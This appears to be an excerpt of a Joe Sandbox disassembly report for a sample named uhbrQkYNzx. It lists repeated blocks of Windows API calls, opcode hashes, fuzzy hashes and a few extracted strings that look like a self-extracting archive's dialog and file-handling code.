                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: f5c147c6afb56decb4fd2ee3866f3f43ddd9d0c708fac419759d80e1d4416dde
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: af2989ee35fcf4f3b9ab43958d4bdccafc1c3f95bad9b5fad136e16249f053ad
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: af2989ee35fcf4f3b9ab43958d4bdccafc1c3f95bad9b5fad136e16249f053ad
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 049f008e933ad10a4d0f6501a96bc9c624f7eae6575794ac1fe8c14437e8ee7e
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: 049f008e933ad10a4d0f6501a96bc9c624f7eae6575794ac1fe8c14437e8ee7e
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • SetDlgItemTextW.USER32(?,?,?), ref: 00991DFC
                                                              Similarity
                                                              • API ID: ItemText
                                                              • String ID:
                                                              • API String ID: 3367045223-0
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              APIs
                                                              • SetEndOfFile.KERNELBASE(?,0099D115,?,?,?,?,?,?,?), ref: 0099E8DC
                                                              Similarity
                                                              • API ID: File
                                                              • String ID:
                                                              • API String ID: 749574446-0
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,00000001,0099DE10,1AC349C0,?,00000000,009C93B1,000000FF,?,0099BEA6,?), ref: 0099DE6B
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00999CB1
                                                                • Part of subcall function 0099AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0099AC2E
                                                                • Part of subcall function 0099AC11: GetLastError.KERNEL32 ref: 0099AC72
                                                                • Part of subcall function 0099AC11: CloseHandle.KERNEL32(?), ref: 0099AC81
                                                                • Part of subcall function 00992F45: _wcslen.LIBCMT ref: 00992F50
                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00999EE1
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 00999F1E
                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0099A0BF
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0099A127
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A134
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A14A
                                                              • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A18E
                                                              • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,1AC35508,009C9937,000000FF), ref: 0099A196
                                                              Similarity
                                                              • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3517300771-3508440684
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 009B163A
                                                                • Part of subcall function 00991E44: GetDlgItem.USER32(00000000,00003021), ref: 00991E88
                                                                • Part of subcall function 00991E44: SetWindowTextW.USER32(00000000,009CC6C8), ref: 00991E9E
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 009B16BB
                                                              • EndDialog.USER32(?,00000006), ref: 009B16CE
                                                              • GetDlgItem.USER32(?,0000006C), ref: 009B16EA
                                                              • SetFocus.USER32(00000000), ref: 009B16F1
                                                                • Part of subcall function 009914A7: _wcslen.LIBCMT ref: 009914B8
                                                                • Part of subcall function 00991DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00991DFC
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 009B1763
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009B1783
                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 009B1826
                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 009B18AD
                                                                • Part of subcall function 00991150: _wcslen.LIBCMT ref: 0099115B
                                                              Strings
                                                              Similarity
                                                              • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                              • String ID: %s %s$REPLACEFILEDLG
                                                              • API String ID: 485132379-439456425
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 4168288129-2761157908
                                                              APIs
                                                              • _strlen.LIBCMT ref: 0099438C
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00994523
                                                              Strings
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                              • String ID: CMT
                                                              • API String ID: 2172594012-2756464174
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009B6884
                                                              • IsDebuggerPresent.KERNEL32 ref: 009B6950
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 009B6970
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 009B697A
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0099952D,?,00000040,0099931E,00000001,?,?,?,?,0000001C,009A7618,009DE0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00999330
                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,0099952D,?,00000040,0099931E,00000001,?,?), ref: 00999351
                                                              • _wcslen.LIBCMT ref: 00999360
                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,009DE0C8,?,?,0099952D,?,00000040,0099931E,00000001,?,?,?,?,0000001C), ref: 00999373
                                                              Similarity
                                                              • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                              • String ID:
                                                              • API String ID: 991192900-0
                                                              APIs
                                                              • VirtualQuery.KERNEL32(80000000,009B4D59,0000001C,009B4F4E,00000000,?,?,?,?,?,?,?,009B4D59,00000004,009E5D84,009B4FDE), ref: 009B4E25
                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,009B4D59,00000004,009E5D84,009B4FDE), ref: 009B4E40
                                                              Strings
                                                              Similarity
                                                              • API ID: InfoQuerySystemVirtual
                                                              • String ID: D
                                                              • API String ID: 401686933-2746444292
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,009B535E), ref: 009BABBC
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,009B535E), ref: 009BABC6
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,009B535E), ref: 009BABD3
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              APIs
                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 009AFD6A
                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,009D9714,?,?), ref: 009AFDB3
                                                              Similarity
                                                              • API ID: FormatInfoLocaleNumber
                                                              • String ID:
                                                              • API String ID: 2169056816-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CMT
                                                              • API String ID: 0-2756464174
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009C86CD,?,?,00000008,?,?,009C836D,00000000), ref: 009C88FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 009B66AA
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 009A03ED
                                                                • Part of subcall function 009A0469: __EH_prolog3.LIBCMT ref: 009A0470
                                                              Similarity
                                                              • API ID: H_prolog3Version
                                                              • String ID:
                                                              • API String ID: 2775145068-0
                                                              Strings
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,009B6445), ref: 009B6A10
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              APIs
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                              • Instruction ID: 389ae195ea79364b49af1a704ee6c9be4127144c3ab655f849b352534a88ff82
                                                              • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                              • Instruction Fuzzy Hash: 538215316047858FCB29CF28C8906BABBE1AF97304F18895DD8DB8B743D735A945CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64fef10c691a35b7a3ba4e7d9d89aa9720d312cd1eb04aa45bfe93c599228c8d
                                                              • Instruction ID: 2c35a4816af978a441d4f7aa072cf2400a95e087e8525e27f01e5b8503bc60bf
                                                              • Opcode Fuzzy Hash: 64fef10c691a35b7a3ba4e7d9d89aa9720d312cd1eb04aa45bfe93c599228c8d
                                                              • Instruction Fuzzy Hash: 5A822C65D3EF895EE3039A3484021E7E3A86EF71C9F46E71FF8A431526E721A6C75201
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                              • Instruction ID: 6a694665c561b00b5aa03e3ac3c75b5e37d9ee30b18a9f04bd0cb9c31db01cb3
                                                              • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                              • Instruction Fuzzy Hash: 577215B16043858FCB15CF6CC8906B9BBE1BF96304F18896DE89A8F346D734E945CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                              • Instruction ID: c50339371dfc5116f93ea0bc18b5d80d3a8ba5d4021277eb2e3b07641061b1e4
                                                              • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                              • Instruction Fuzzy Hash: FD525BB26187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: caf2efd39f9e55a9aaa80ed79a2613458eadaa5607cd3dea6142ed209d55e2af
                                                              • Instruction ID: 048175675fd037cda4e4fe73fced3dfe018553e391117cd1d4bccb7cb2122818
                                                              • Opcode Fuzzy Hash: caf2efd39f9e55a9aaa80ed79a2613458eadaa5607cd3dea6142ed209d55e2af
                                                              • Instruction Fuzzy Hash: 0412D7B16047068FDB18CF28C495BB9B7E0FF45318F14893DE59ACB281D778A995CB81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d76470d1f3badcf99b1783ee2a0d21f2ef11366d70645bca11d92a6003d3232
                                                              • Instruction ID: b8a591e06ff4fedf0cf2156557655caf0a6a167f5a311fc51217f7c832aeb08e
                                                              • Opcode Fuzzy Hash: 3d76470d1f3badcf99b1783ee2a0d21f2ef11366d70645bca11d92a6003d3232
                                                              • Instruction Fuzzy Hash: 02E13AB551C3948FC344CF29D89446ABBE0BF99300F46495EF9E49B352C334EA16DBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05bbb3a81df7d8ab0f11172c3c5de55eff4b987edc34a288a88d401fa20a0916
                                                              • Instruction ID: 6dc3b23ac127cc20be52e82ba91c31916fb9b12485c5ec1820b979098e5e19d1
                                                              • Opcode Fuzzy Hash: 05bbb3a81df7d8ab0f11172c3c5de55eff4b987edc34a288a88d401fa20a0916
                                                              • Instruction Fuzzy Hash: C89137313083424FDB25DF68C8947AEB7D6ABD6314F14093DF98A87282DB789985C793
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                              • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
APIs
• _swprintf.LIBCMT ref: 009A3EEA
  • Part of subcall function 0099F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0099F6CD
  • Part of subcall function 009A89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,009DE088,?,00000007,009A33E2,?,?,00000050,1AC349C0), ref: 009A8A0A
• _strlen.LIBCMT ref: 009A3F0B
• SetDlgItemTextW.USER32(?,009D919C,?), ref: 009A3F64
• GetWindowRect.USER32(?,?), ref: 009A3F9A
• GetClientRect.USER32(?,?), ref: 009A3FA6
• GetWindowLongW.USER32(?,000000F0), ref: 009A4051
• GetWindowRect.USER32(?,?), ref: 009A4081
• SetWindowTextW.USER32(?,?), ref: 009A40B0
• GetSystemMetrics.USER32(00000008), ref: 009A40B8
• GetWindow.USER32(?,00000005), ref: 009A40C3
• GetWindowRect.USER32(00000000,?), ref: 009A40F3
• GetWindow.USER32(00000000,00000002), ref: 009A4165
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
• String ID: $%s:$CAPTION$d
• API String ID: 2407758923-2512411981
• Opcode ID: dc6c256526f1d2b86afc8c2172a90af8cc168ecda7342bf83c9b080f8c85dfd2
• Instruction ID: e635ddb0e0df0acace5cc82a96e6ed2ea698f8c19629eb6c89516dd19e0dd1fb
• Opcode Fuzzy Hash: dc6c256526f1d2b86afc8c2172a90af8cc168ecda7342bf83c9b080f8c85dfd2
• Instruction Fuzzy Hash: C4819A72508341AFD714DFA8CD89B6BBBE9EBC9704F00491DF98597290D770E9098B92
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(009E60E0,00000FA0,?,?,009B6185), ref: 009B61B3
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,009B6185), ref: 009B61BE
• GetModuleHandleW.KERNEL32(kernel32.dll,?,?,009B6185), ref: 009B61CF
